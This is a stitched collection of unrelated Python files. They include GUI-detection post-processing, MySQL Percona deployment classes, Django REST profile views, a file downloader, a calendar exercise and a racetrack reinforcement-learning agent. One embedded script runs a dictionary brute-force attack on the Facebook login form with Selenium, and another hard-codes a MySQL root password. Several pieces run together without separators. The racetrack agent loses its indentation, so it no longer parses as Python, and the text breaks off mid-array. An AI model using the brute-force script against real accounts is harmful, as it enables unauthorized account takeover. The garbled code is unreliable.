        for text_a in texts:
            merged = False
            for text_b in temp_set:
                # bias=(0, max_line_gap) stretches boxes vertically so
                # near-touching lines register an intersection
                inter_area, _, _, _ = text_a.calc_intersection_area(text_b, bias=(0, max_line_gap))
                if inter_area > 0:
                    text_b.element_merge(text_a)
                    merged = True
                    changed = True
                    break
            if not merged:
                temp_set.append(text_a)
        texts = temp_set.copy()
    return non_texts + texts
def refine_elements(compos, texts, intersection_bias=(2, 2), containment_ratio=0.8):
    '''
    Cross-filter non-text components against text boxes:
    1. remove compos contained in text
    2. remove compos containing text area that's too large
    3. store text in a compo if it's contained by the compo as the compo's text child element
    Returns the surviving compos followed by the texts not swallowed by any compo.
    '''
    elements = []
    contained_texts = []  # texts absorbed by some compo (across all compos)
    for compo in compos:
        is_valid = True
        text_area = 0
        for text in texts:
            # iou/ioa/iob: intersection over union / compo area / text area
            inter, iou, ioa, iob = compo.calc_intersection_area(text, bias=intersection_bias)
            if inter > 0:
                # the non-text is contained in the text compo
                if ioa >= containment_ratio:
                    is_valid = False
                    break
                text_area += inter
                # the text is contained in the non-text compo
                if iob >= containment_ratio and compo.category != 'Block':
                    contained_texts.append(text)
        # keep compos whose covered text area stays below the threshold
        # NOTE(review): division assumes compo.area > 0 — confirm upstream.
        if is_valid and text_area / compo.area < containment_ratio:
            # for t in contained_texts:
            #     t.parent_id = compo.id
            # compo.children += contained_texts
            elements.append(compo)
    # elements += texts
    for text in texts:
        if text not in contained_texts:
            elements.append(text)
    return elements
def check_containment(elements):
    """Record parent/child links for every containing pair of elements.

    element_relation returns -1 when the first element lies inside the
    second, 1 for the reverse; children lists and parent_id are updated
    accordingly.
    """
    for idx, outer in enumerate(elements[:-1]):
        for inner in elements[idx + 1:]:
            relation = outer.element_relation(inner, bias=(2, 2))
            if relation == -1:
                # outer is contained by inner
                inner.children.append(outer)
                outer.parent_id = inner.id
            if relation == 1:
                # inner is contained by outer
                outer.children.append(inner)
                inner.parent_id = outer.id
def remove_top_bar(elements, img_height):
    """Filter out small elements hugging the top edge (likely a status bar).

    An element is dropped when it starts within 10 px of the top and its
    height is under 4% of the image height.
    """
    threshold = img_height * 0.04
    return [ele for ele in elements
            if not (ele.row_min < 10 and ele.height < threshold)]
def remove_bottom_bar(elements, img_height):
    """Filter out small square elements near the bottom (likely nav icons).

    Thresholds are tuned for an 800-pixel-high GUI: rows past 750 with a
    20-30 px height and width are treated as navigation-bar icons.
    """
    kept = []
    for ele in elements:
        near_bottom = ele.row_min > 750
        icon_sized = 20 <= ele.height <= 30 and 20 <= ele.width <= 30
        if near_bottom and icon_sized:
            continue
        kept.append(ele)
    return kept
def compos_clip_and_fill(clip_root, org, compos):
    """Crop every component out of *org* into per-class folders and build a
    component-free background image.

    Each compo dict gains a 'path' key pointing at its saved clip; each
    cropped area in the background copy is painted with the dominant
    surrounding colour, and the result is saved as clip_root/bkg.png.
    clip_root is wiped and re-created on every call.
    """
    def most_pix_around(pad=6, offset=2):
        '''
        determine the filled background color according to the most surrounding pixel
        '''
        # Reads row_min/col_min/row_max/col_max from the enclosing loop
        # iteration; samples a pad-wide ring around the box (skipping an
        # offset margin) and takes the most frequent value per channel.
        up = row_min - pad if row_min - pad >= 0 else 0
        left = col_min - pad if col_min - pad >= 0 else 0
        bottom = row_max + pad if row_max + pad < org.shape[0] - 1 else org.shape[0] - 1
        right = col_max + pad if col_max + pad < org.shape[1] - 1 else org.shape[1] - 1
        most = []
        for i in range(3):
            val = np.concatenate((org[up:row_min - offset, left:right, i].flatten(),
                                  org[row_max + offset:bottom, left:right, i].flatten(),
                                  org[up:bottom, left:col_min - offset, i].flatten(),
                                  org[up:bottom, col_max + offset:right, i].flatten()))
            most.append(int(np.argmax(np.bincount(val))))
        return most

    if os.path.exists(clip_root):
        shutil.rmtree(clip_root)
    os.mkdir(clip_root)
    bkg = org.copy()
    cls_dirs = []  # class sub-directories created so far
    for compo in compos:
        cls = compo['class']
        if cls == 'Background':
            compo['path'] = pjoin(clip_root, 'bkg.png')
            continue
        c_root = pjoin(clip_root, cls)
        c_path = pjoin(c_root, str(compo['id']) + '.jpg')
        compo['path'] = c_path
        if cls not in cls_dirs:
            os.mkdir(c_root)
            cls_dirs.append(cls)
        position = compo['position']
        col_min, row_min, col_max, row_max = position['column_min'], position['row_min'], position['column_max'], position['row_max']
        cv2.imwrite(c_path, org[row_min:row_max, col_min:col_max])
        # Fill up the background area
        cv2.rectangle(bkg, (col_min, row_min), (col_max, row_max), most_pix_around(), -1)
    cv2.imwrite(pjoin(clip_root, 'bkg.png'), bkg)
def merge(img_path, compo_path, text_path, merge_root=None, is_paragraph=False, is_remove_bar=True, show=False, wait_key=0):
    """Fuse OCR text boxes and non-text component boxes for one screenshot.

    Loads the two detection JSONs, rescales texts onto the compo image size,
    refines/filters the elements, optionally merges text lines into
    paragraphs and strips top/bottom bars, then writes <name>.json and
    <name>.jpg under merge_root. Returns (annotated_image, components).
    NOTE(review): merge_root=None would crash pjoin at the end — callers
    appear to always supply it; confirm.
    """
    compo_json = json.load(open(compo_path, 'r'))
    text_json = json.load(open(text_path, 'r'))
    # load text and non-text compo, assigning ids sequentially across both
    ele_id = 0
    compos = []
    for compo in compo_json['compos']:
        element = Element(ele_id, (compo['column_min'], compo['row_min'], compo['column_max'], compo['row_max']), compo['class'])
        compos.append(element)
        ele_id += 1
    texts = []
    for text in text_json['texts']:
        element = Element(ele_id, (text['column_min'], text['row_min'], text['column_max'], text['row_max']), 'Text', text_content=text['content'])
        texts.append(element)
        ele_id += 1
    # text detection may have run at a different resolution: rescale texts
    if compo_json['img_shape'] != text_json['img_shape']:
        resize_ratio = compo_json['img_shape'][0] / text_json['img_shape'][0]
        for text in texts:
            text.resize(resize_ratio)
    # check the original detected elements
    img = cv2.imread(img_path)
    img_resize = cv2.resize(img, (compo_json['img_shape'][1], compo_json['img_shape'][0]))
    show_elements(img_resize, texts + compos, show=show, win_name='all elements before merging', wait_key=wait_key)
    # refine elements
    texts = refine_texts(texts, compo_json['img_shape'])
    elements = refine_elements(compos, texts)
    if is_remove_bar:
        elements = remove_top_bar(elements, img_height=compo_json['img_shape'][0])
        elements = remove_bottom_bar(elements, img_height=compo_json['img_shape'][0])
    if is_paragraph:
        elements = merge_text_line_to_paragraph(elements, max_line_gap=7)
    reassign_ids(elements)
    check_containment(elements)
    board = show_elements(img_resize, elements, show=show, win_name='elements after merging', wait_key=wait_key)
    # save all merged elements, clips and blank background
    name = img_path.replace('\\', '/').split('/')[-1][:-4]
    components = save_elements(pjoin(merge_root, name + '.json'), elements, img_resize.shape)
    cv2.imwrite(pjoin(merge_root, name + '.jpg'), board)
    print('[Merge Completed] Input: %s Output: %s' % (img_path, pjoin(merge_root, name + '.jpg')))
    return board, components
|
from selenium import webdriver
import time
## Author = [Przemysław Szmaj]
## GitHub = https://github.com/PSZMAJ
## YouTube = https://www.youtube.com/channel/UCewT7Lr5f6LWvqSPXm0JKRw
# NOTE(review): this script performs a dictionary attack against a login
# form. Running it against accounts you do not own is illegal — restrict any
# use to explicitly authorized security testing.
login = input('Please eneter login: ')
browser = webdriver.Firefox()
browser.get('https://www.facebook.com/login.php')
class Attack:
    # Selenium driver of the login-form interaction; uses the module-level
    # 'browser' and 'login' globals.
    def addlogin(self):
        # locate xpath and send login.
        self.button_username = browser.find_element_by_xpath('//*[@id="email"]')
        self.button_username.click()
        time.sleep(0.5)
        self.button_username.send_keys(login)
        time.sleep(0.5)
    def FbBruteForceDictionary(self):
        # this function has a special task:
        # 1. Locate xpath form "password"
        # 2. Send key from dictionary.
        # 3. Locate xpath button login and click.
        login_attempt = 0
        with open("dict.txt", "r") as file:
            lines = file.readlines()
            for line in lines:
                self.button_password = browser.find_element_by_xpath('//*[@id="pass"]')
                self.button_password.click()
                time.sleep(0.5)
                self.button_password.send_keys(line)
                self.button_login = browser.find_element_by_xpath('//*[@id="loginbutton"]')
                self.button_login.click()
                login_attempt = login_attempt + 1
                print("____________________________________________________________")
                print(' Login attempt', login_attempt, ' with key/password : ', line )
                print("____________________________________________________________")
p = Attack()
p.addlogin()
p.FbBruteForceDictionary()
def is_perfect_square(n):
    """Return True iff n is a perfect square, via integer Newton iteration.

    A non-square is detected when the iteration revisits a value (cycle).
    Handles n < 2 directly: the original raised ZeroDivisionError for n == 1
    and looped into `n // x` with negative inputs; it also returned the
    undefined name 'false' (NameError) for every non-square.
    """
    if n < 0:
        return False
    if n < 2:
        # 0 and 1 are squares; also avoids n // x with x == 0
        return True
    x = n // 2
    seen = {x}
    while x * x != n:
        x = (x + n // x) // 2
        if x in seen:
            return False  # was 'false' — a NameError at runtime
        seen.add(x)
    return True

print(is_perfect_square(8))
print(is_perfect_square(9))
print(is_perfect_square(100))
|
# -*- coding: utf-8 -*-
import logging
from .mysql import MySQLSingle, MySQLFoxHA, MySQLFoxHAAWS
from .mysql import MySQLSingleGCP, MySQLFoxHAGCP
from physical.models import Instance
from base import InstanceDeploy
LOG = logging.getLogger(__name__)
class MySQLPerconaSingle(MySQLSingle):
    """Single-instance MySQL Percona deployment (one instance, port 3306)."""
    @property
    def driver_name(self):
        return 'mysql_percona_single'
    def deploy_instances(self):
        # One inner list per host; one instance per list.
        return [[InstanceDeploy(Instance.MYSQL_PERCONA, 3306)]]
class MySQLPerconaFoxHA(MySQLFoxHA):
    """FoxHA (two-node HA) MySQL Percona deployment, one instance per host."""
    @property
    def driver_name(self):
        return 'mysql_percona_foxha'
    def deploy_instances(self):
        # Two hosts, each with a single instance on 3306.
        return [
            [InstanceDeploy(Instance.MYSQL_PERCONA, 3306)],
            [InstanceDeploy(Instance.MYSQL_PERCONA, 3306)]
        ]
class MySQLPerconaFoxHAAWS(MySQLFoxHAAWS):
    """FoxHA MySQL Percona deployment on AWS hosts."""
    @property
    def driver_name(self):
        # NOTE(review): same driver name as the non-AWS FoxHA variant —
        # confirm this is intentional.
        return 'mysql_percona_foxha'
    def deploy_instances(self):
        # Two hosts, each with a single instance on 3306.
        return [
            [InstanceDeploy(Instance.MYSQL_PERCONA, 3306)],
            [InstanceDeploy(Instance.MYSQL_PERCONA, 3306)]
        ]
class MySQLPerconaSingleGCP(MySQLSingleGCP):
    """Single-instance MySQL Percona deployment on GCP hosts."""
    @property
    def driver_name(self):
        return 'mysql_percona_single'
    def deploy_instances(self):
        # One host with a single instance on 3306.
        return [[InstanceDeploy(Instance.MYSQL_PERCONA, 3306)]]
class MySQLPerconaFoxHAGCP(MySQLFoxHAGCP):
    """FoxHA MySQL Percona deployment on GCP hosts."""
    @property
    def driver_name(self):
        return 'mysql_percona_foxha'
    def deploy_instances(self):
        # Two hosts, each with a single instance on 3306.
        return [
            [InstanceDeploy(Instance.MYSQL_PERCONA, 3306)],
            [InstanceDeploy(Instance.MYSQL_PERCONA, 3306)]
        ]
|
import mysql.connector
# NOTE(review): credentials are hard-coded below — move host/user/password
# into environment variables or a config file before sharing or deploying.
mydb = mysql.connector.connect(host="localhost",user="root",passwd="krishnatej",database="sample1")
mycursor = mydb.cursor()
# Fetch and print every row of table s1.
mycursor.execute("select * from s1")
for i in mycursor:
    print(i)
import sys
import pandas as pds
import numpy as np
# Count the distinct values of one column of a CSV file.
# Usage: check_predict <csv_file_name> <predict_field_name>
if len(sys.argv) < 3:
    print("Usage check_predict csv_file_name predict_field_name")
    sys.exit()
filename = sys.argv[1]
predict = sys.argv[2]
print("Checking " + predict + " in " + filename)
# Only the column of interest is loaded.
dataf = pds.read_csv(filename,
                     sep=',',
                     usecols=[predict],
                     skipinitialspace=True,
                     quotechar='"')
predict_array = dataf[[predict]].values
print(predict_array)
print(type(predict_array))  # was Python-2 'print type(...)': SyntaxError on Python 3
# Tally occurrences of each non-falsy value in the column.
unique_list = []
count_dict = {}
for row in predict_array:
    val = row[0]
    print(val)
    print(type(val))
    if not val:
        continue
    if val not in unique_list:
        unique_list.append(val)
        count_dict[val] = 1
    else:
        count_dict[val] = count_dict[val] + 1
print(str(count_dict))
# coding: utf-8
from datetime import timedelta
from rest_framework.views import APIView
from rest_framework import generics
from rest_framework.response import Response
from rest_framework import exceptions
from rest_framework.authentication import TokenAuthentication
from rest_framework.permissions import IsAuthenticated
from rest_framework import status
from rest_framework.authtoken.models import Token
from django.shortcuts import get_object_or_404
from django.conf import settings
from django.db import transaction, IntegrityError
from djoser import views as djoser_views
from api import models, serializers
from retalk import helpers
class APIStopCap(APIView):
    """ View to close unneeded path of djoser """
    def dispatch(self, request, *args, **kwargs):
        # Reject every HTTP method: mounting this view over an unwanted
        # djoser URL effectively disables that endpoint.
        raise exceptions.PermissionDenied
class CheckToken(APIView):
    """ View just to check user auth token. If token is correct
    http-response with status 200 (OK) returns
    """
    authentication_classes = (TokenAuthentication,)
    permission_classes = (IsAuthenticated,)
    def post(self, request, format=None, **kwargs):
        # Authentication already ran in the classes above; reaching this
        # body means the token was valid.
        return Response({'success': True}, status=status.HTTP_200_OK)
class DetailUserInfo(generics.RetrieveAPIView):
    """Read-only profile lookup by the e-mail given in the URL kwargs."""
    authentication_classes = (TokenAuthentication,)
    permission_classes = (IsAuthenticated,)
    serializer_class = serializers.PersonalInfoSerializer
    def get_object(self):
        # self.email is set by get() below before the parent handler runs.
        return get_object_or_404(models.User, email=self.email)
    def get(self, request, format=None, **kwargs):
        """ Show user profile """
        self.email = kwargs.get('email', None)
        return super(DetailUserInfo, self).get(request, format, **kwargs)
class MyProfile(generics.RetrieveUpdateAPIView):
    """Retrieve or update the authenticated user's own profile."""
    authentication_classes = (TokenAuthentication,)
    permission_classes = (IsAuthenticated,)
    serializer_class = serializers.PersonalInfoSerializer
    def save_ct(self, request):
        # Debug helper: append the request Content-Type to ct.txt
        # (only referenced from the commented-out line in catch_user).
        import os
        from django.conf import settings
        path = os.path.join(settings.BASE_DIR, 'ct.txt')
        with open(path, 'a') as f:
            f.write(request.META.get('CONTENT_TYPE') + '\n')
    def get_object(self):
        # self.usr is set by catch_user() before each parent handler runs.
        return self.usr
    def catch_user(self, request):
        # self.save_ct(request)
        self.usr = request.user
    def get(self, request, format=None, **kwargs):
        """ Get my personal info """
        self.catch_user(request)
        return super(MyProfile, self).get(request, format, **kwargs)
    def put(self, request, format=None, **kwargs):
        """ Change my profile """
        self.catch_user(request)
        return super(MyProfile, self).put(request, format, **kwargs)
    def patch(self, request, *args, **kwargs):
        """ Change my profile too """
        self.catch_user(request)
        return super(MyProfile, self).patch(request, *args, **kwargs)
    def options(self, request, *args, **kwargs):
        self.catch_user(request)
        return super(MyProfile, self).options(request, *args, **kwargs)
class StatusTag(generics.UpdateAPIView, generics.ListAPIView):
    """Set the caller's status tag (PUT/PATCH) or list the still-actual tags
    of users inside a lat/long bounding box around the caller (GET)."""
    authentication_classes = (TokenAuthentication,)
    permission_classes = (IsAuthenticated,)
    serializer_class = serializers.StatusTagSerializer
    def put(self, request, *args, **kwargs):
        """ Set new status tag """
        user = request.user
        serializer = self.serializer_class(user, data=request.data)
        if serializer.is_valid():
            # collect old status-tags for statistic
            if user.status_tag:
                user.archive_status_tag()
            user.status_created_time = helpers.aware_now()
            serializer.save()
            return Response(serializer.data)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
    def patch(self, request, *args, **kwargs):
        """ Set new status tag too"""
        return self.put(request, *args, **kwargs)
    def get(self, request, *args, **kwargs):
        """ Get all status tags near request user """
        try:
            cur_latitude = float(request.GET.get('latitude', None))  # latitude
            cur_longitude = float(
                request.GET.get('longitude', None))  # longitude
        except (TypeError, ValueError):
            return Response({}, status=status.HTTP_400_BAD_REQUEST)
        latitude_delta = settings.LATITUDE_DELTA
        # longitude span per distance depends on latitude; the helper
        # presumably converts using radius settings.R — confirm.
        longitude_delta = helpers.get_longitude_delta(cur_latitude, settings.R)
        # active users inside the bounding box, excluding the requester
        qs = models.User.objects.filter(is_active=True,
                                        latitude__gte=cur_latitude - latitude_delta,
                                        latitude__lte=cur_latitude + latitude_delta,
                                        longitude__gte=cur_longitude - longitude_delta,
                                        longitude__lte=cur_longitude + longitude_delta).exclude(pk=request.user.pk)
        answer = {}
        for usr in qs:
            if usr.status_created_time and usr.status_expire_time:
                td = helpers.td_in_minutes(
                    helpers.aware_now() - usr.status_created_time)
                # status tag is still actual
                if td <= usr.status_expire_time:
                    status_data = self.serializer_class(usr).data
                    status_data['minutes_passed'] = td
                    status_data['avatar'] = '%s://%s%s' % (
                        request.scheme, request.META['HTTP_HOST'],
                        usr.avatar.url) if usr.avatar else ''
                    answer[usr.email] = status_data
        return Response(answer)
class SetPassword(djoser_views.SetPasswordView):
    """ Change password view. Use djoser one + remove current token """
    def action(self, serializer):
        # Rotate the auth token atomically with the password change so a
        # stolen token stops working the moment the password changes.
        try:
            with transaction.atomic():
                # we do not need try/except because this view only for authenticated
                # users, who definitely have a token
                old_token = Token.objects.get(user=self.request.user)
                old_token.delete()
                self.request.user.set_password(serializer.data['new_password'])
                self.request.user.save()
                new_token = Token.objects.create(user=self.request.user)
                answer = {"auth_token": new_token.key}
                answer_status = status.HTTP_200_OK
        except IntegrityError:
            # NOTE(review): 'transaction_rerror' looks like a typo for
            # 'transaction_error', but the key is part of the response payload —
            # renaming it would break API clients.
            answer = {'transaction_rerror': 'Smth is wrong. Transaction rolled back'}
            answer_status = status.HTTP_400_BAD_REQUEST
        return Response(answer, status=answer_status)
class Logout(djoser_views.LogoutView):
    """ Logout user and send not empty http-response body """
    def post(self, request):
        # Delegate the actual token removal to djoser, then replace its empty
        # response with an explicit JSON payload for clients.
        super(Logout, self).post(request)
        return Response({"success": True}, status=status.HTTP_200_OK)
|
import requests
import os
from tqdm import tqdm
import sys
def get_json(url):
    """Perform a GET request against *url* and return the parsed JSON body.

    :param url: URL.
    :return: the received Json data.
    """
    response = requests.get(url=url)
    return response.json()
def get_file(url, output_file, show_progress_bar=True):
    """
    Downloads a file, streaming it in 1 KiB chunks with a tqdm progress bar.
    Source: https://github.com/sirbowen78/lab/blob/master/file_handling/dl_file1.py
    :param url: url of the file to be downloaded
    :param output_file: file where the downloaded data is saved. Parent
        directories are created as needed.
    :param show_progress_bar: If true progressbar is shown otherwise False
    :return: None
    """
    # NOTE(review): raises KeyError/ValueError if the server omits or mangles
    # the Content-Length header — confirm all target servers provide it.
    filesize = int(requests.head(url).headers["Content-Length"])
    os.makedirs(os.path.dirname(output_file), exist_ok=True)
    chunk_size = 1024
    with requests.get(url, stream=True) as r, open(output_file, "wb") as f, tqdm(
            unit="B",  # unit string to be displayed
            unit_scale=True,
            unit_divisor=1024,
            total=filesize,
            file=sys.stdout,
            disable=not show_progress_bar,
            desc="Downloading file {}".format(os.path.basename(output_file),
                                              )
    ) as progress:
        for chunk in r.iter_content(chunk_size=chunk_size):
            # download the file chunk by chunk
            datasize = f.write(chunk)
            # on each chunk update the progress bar.
            progress.update(datasize)
|
"""
The Python standard library's 'calendar' module allows you to
render a calendar to your terminal.
https://docs.python.org/3.6/library/calendar.html
Write a program that accepts user input of the form
`14_cal.py month [year]`
and does the following:
- If the user doesn't specify any input, your program should
print the calendar for the current month. The 'datetime'
module may be helpful for this.
- If the user specifies one argument, assume they passed in a
month and render the calendar for that month of the current year.
- If the user specifies two arguments, assume they passed in
both the month and the year. Render the calendar for that
month and year.
- Otherwise, print a usage statement to the terminal indicating
the format that your program expects arguments to be given.
Then exit the program.
"""
import sys
import calendar
from datetime import datetime
# Render a month calendar per the "14_cal.py month [year]" assignment.
usage = (
    'The format is :\n\n"14_cal.py month [year]"\n\n where "month" is a number 1-12 and "[year]" is a optional 4 digit number.')
current_month = int(datetime.now().month)
current_year = int(datetime.now().year)
try:
    if len(sys.argv) <= 1:
        # no arguments: current month of the current year
        print(calendar.month(current_year, current_month))
    elif len(sys.argv) == 2:
        # one argument: that month of the current year
        print(calendar.month(current_year, int(sys.argv[1])))
    elif len(sys.argv) == 3:
        # two arguments: month then year
        print(calendar.month(int(sys.argv[2]), int(sys.argv[1])))
    else:
        print(usage)
except (ValueError, calendar.IllegalMonthError):
    # non-numeric or out-of-range arguments previously crashed with a
    # traceback; the assignment asks for a usage message instead
    print(usage)
import os
def visit_directory(path, file_name):
    """Recursively search *path* for a file named *file_name* and delete it.

    Returns True as soon as one matching file has been removed, False when
    the subtree holds no match. (The original discarded the recursive call's
    result, so it never stopped at — and could delete matches beyond — the
    first hit, and implicitly returned None when nothing matched.)
    """
    for entry in os.listdir(path):
        sub_path = os.path.join(path, entry)
        if entry == file_name and os.path.isfile(sub_path):
            os.remove(sub_path)
            return True
        if os.path.isdir(sub_path) and visit_directory(sub_path, file_name):
            return True
    return False
|
import numpy as np
import pickle
import matplotlib.pyplot as plt
class RaceTrack:
    """Racetrack gridworld (Sutton & Barto style): a car accelerates across a
    course; walls end the episode with a large penalty, goal cells end it
    with reward 0, every other step costs -1."""
    def __init__(self, course):
        # maximum velocity per axis, in cells per step
        self.v_max = 5
        self._load_course(course)
        self.reset()
    def _load_course(self, course):
        # flip course upside down so 0,0 is bottom left
        self.course = np.flipud(course)
        # 0 are walls
        # 1 is the track
        # 8 are starts
        # 9 are ends
        self.starts = np.where(self.course == 8)
        # transpose -> array of (row, col) start cells
        self.starts = np.transpose(self.starts)
    def reset(self):
        """Place the car on a random start cell with velocity (1, 0)."""
        s = np.random.randint(0, len(self.starts))
        self.position = self.starts[s].copy()
        self.velocity = np.array([1, 0])
    def valid_actions(self):
        """All 9 per-axis acceleration pairs in {-1, 0, 1} x {-1, 0, 1}."""
        return [(x, y) for x in range(-1, 2) for y in range(-1, 2)]
    def _update(self, action):
        """Apply an acceleration, clip velocity to [0, v_max] and keep it
        nonzero, then move and clamp the position inside the course bounds."""
        temp = self.velocity
        # NOTE(review): += mutates the array 'temp' also references, so the
        # argmax below sees the post-update (pre-clip) velocity rather than
        # the previous one — confirm this is intended.
        self.velocity += action
        self.velocity = np.clip(self.velocity, 0, self.v_max)
        # if both velocity are 0. Set the previous max to 1
        if np.sum(self.velocity) == 0:
            self.velocity[np.argmax(temp)] = 1
        temp = self.position
        self.position += self.velocity
        self.position[0] = np.clip(self.position[0],
                                   0, np.shape(self.course)[0] - 1)
        self.position[1] = np.clip(self.position[1],
                                   0, np.shape(self.course)[1] - 1)
    def step(self, action):
        """Advance one step; returns ((position, velocity), reward, done)."""
        self._update(action)
        pos = self.course[self.position[0], self.position[1]]
        observation = (self.position, self.velocity)
        if pos == 0:
            # crashed into a wall
            done = True
            reward = -1000
        elif pos == 9:
            # reached a goal cell
            done = True
            reward = 0
        else:
            done = False
            reward = -1
        return observation, reward, done
    def get_observation(self):
        """Current (position, velocity) pair."""
        return self.position, self.velocity
    def print_state(self):
        """Plot the course with the car's current cell highlighted (value 5)."""
        state = self.course.copy()
        state[self.position[0], self.position[1]] = 5
        #print(np.array2string(state))
        plt.imshow(state, cmap='hot')
        plt.show()
class Agent:
    def __init__(self, env):
        """Off-policy Monte-Carlo control agent for a RaceTrack-style env."""
        self.env = env
        self.gamma = 0.9    # discount factor
        self.epsilon = 0.1  # exploration rate of the behaviour policy mu
        self.reset()
    def reset(self):
        """Allocate the learning tables over (position-hash, velocity-hash,
        action) and initialise pi to action index 8 (acceleration (+1, +1)).

        Q: action values; N: cumulative importance weights; D: unused here.
        """
        self.Q = np.zeros((np.prod(np.shape(self.env.course)),
                           (self.env.v_max + 1)**2, 9))
        self.N = np.zeros((np.prod(np.shape(self.env.course)),
                           (self.env.v_max + 1)**2, 9))
        self.D = np.zeros((np.prod(np.shape(self.env.course)),
                           (self.env.v_max + 1)**2, 9))
        self.pi = np.ones((np.prod(np.shape(self.env.course)),
                           (self.env.v_max + 1)**2), dtype='int') * 8
        self._update_mu()
    def _update_mu(self):
        """Rebuild the epsilon-soft behaviour policy mu around the greedy pi:
        every action gets probability epsilon/9, the greedy one an extra
        1 - epsilon."""
        self.mu = np.ones((np.prod(np.shape(self.env.course)),
                           (self.env.v_max + 1)**2, 9))
        self.mu *= self.epsilon / 9
        for i, j in np.ndindex(np.shape(self.mu)[0:2]):
            self.mu[i, j, int(self.pi[i, j])] += 1 - self.epsilon
def _hash_position(self, position):
m = np.shape(self.env.course)[1]
return m*position[0] + position[1]
def _position_from_hash(self, p_hash):
m = np.shape(self.env.course)[1]
i = p_hash//m
j = p_hash % m
return i, j
def _hash_velocity(self, velocity):
m = self.env.v_max
return m*velocity[0] + velocity[1]
def _velocity_from_hash(self, v_hash):
m = self.env.v_max
i = v_hash//m
j = v_hash % m
return i, j
def _hash_action(self, action):
return 3*(action[0] + 1) + action[1] + 1
def _action_from_hash(self, a_hash):
i = a_hash // 3 - 1
j = a_hash % 3 - 1
return i, j
def _obs_to_state(self, obs):
state = []
state.append(int(self._hash_position(obs[0])))
state.append(int(self._hash_velocity(obs[1])))
return state
def _state_to_obs(self, state):
obs = [(0,0), (0,0)]
obs[0] = self._position_from_hash(state[0])
obs[1] = self._velocity_from_hash(state[1])
return obs
def _generate_episode(self, greedy=False):
done = False
self.env.reset()
obs = self.env.get_observation()
states = []
actions = []
rewards = []
while not done:
s = self._obs_to_state(obs)
states.append(s)
if not greedy:
a = np.random.choice(range(9), p=self.mu[s[0], s[1]])
else:
a = self.pi[s[0], s[1]]
actions.append(a)
a = self._action_from_hash(a)
obs, r, done = self.env.step(a)
rewards.append(r)
states.append(self._obs_to_state(obs))
return states, actions, rewards
def _get_last_non_greedy(self, s, a):
# remove terminal state
s = s[:-1]
for i in reversed(range(len(s))):
if self.pi[s[i][0], s[i][1]] != a[i]:
return i
# if the episode follows pi all along return the terminal state index
return len(s) + 1
def _update_Q(self, s, a, r, tau):
sa = list(zip(s[tau:-1], a[tau:]))
unique_sa = set([(s[0][0], s[0][1], s[1]) for s in sa])
# we want r1 for s0a0 but because there is no r0 in r : r[0] = r1
r = r[tau:]
for elt in unique_sa:
i = sa.index(([elt[0], elt[1]], elt[2]))
Gi = np.sum([r[i + x] * self.epsilon**x \
for x in range(len(sa) - i)])
# W = np.prod([1 / self.mu[sa[j][0][0], sa[j][0][1], sa[j][1]]
# for j in range(i + 1, len(sa))])
W = (1 / (1 - self.epsilon + (self.epsilon / 9)))**(len(sa)-(i+1))
self.N[sa[i][0][0], sa[i][0][1], sa[i][1]] += W
c = self.N[sa[i][0][0], sa[i][0][1], sa[i][1]]
temp = self.Q[sa[i][0][0], sa[i][0][1], sa[i][1]]
self.Q[sa[i][0][0], sa[i][0][1], sa[i][1]] += W / c * (Gi - temp)
def _update_policies(self):
for p, v in np.ndindex(np.shape(self.pi)):
self.pi[p, v] = np.argmax(self.Q[p, v])
self._update_mu()
def _print_episode(self, s):
state = self.env.course.copy()
pos = [p[0] for p in s]
pos = [self._position_from_hash(p) for p in pos]
for p in pos:
state[p[0], p[1]] = 5
#print(np.array2string(state))
plt.imshow(state, cmap='hot')
plt.show()
def play(self, n, display=False):
for _ in range(n):
s, a, r = self._generate_episode(True)
if display:
self._print_episode(s)
def train(self, n, display=False):
for _ in range(n):
s, a, r = self._generate_episode()
tau = self._get_last_non_greedy(s, a)
if tau == len(s):
pass
self._update_Q(s, a, r, tau)
self._update_policies()
if display:
self._print_episode(s)
# test greedy policy
# break if victory
# s, a, r = self._generate_episode(True)
# if r > -1000:
# break
# Race-track layout. Based on the step() logic above: 0 = off-track
# (crash, reward -1000), 9 = finish (reward 0), 1 = drivable track;
# presumably 8 marks the start row -- confirm against the env's reset().
course = np.array([
    [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
    [0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,9],
    [0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,9],
    [0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,9],
    [0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,9],
    [0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,9],
    [0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,9],
    [0,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0],
    [0,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
    [0,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
    [0,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
    [0,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
    [0,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
    [0,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
    [0,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
    [0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
    [0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
    [0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
    [0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
    [0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
    [0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
    [0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
    [0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
    [0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
    [0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
    [0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
    [0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
    [0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
    [0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
    [0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
    [0,0,0,0,1,1,1,1,1,1,0,0,0,0,0,0,0,0],
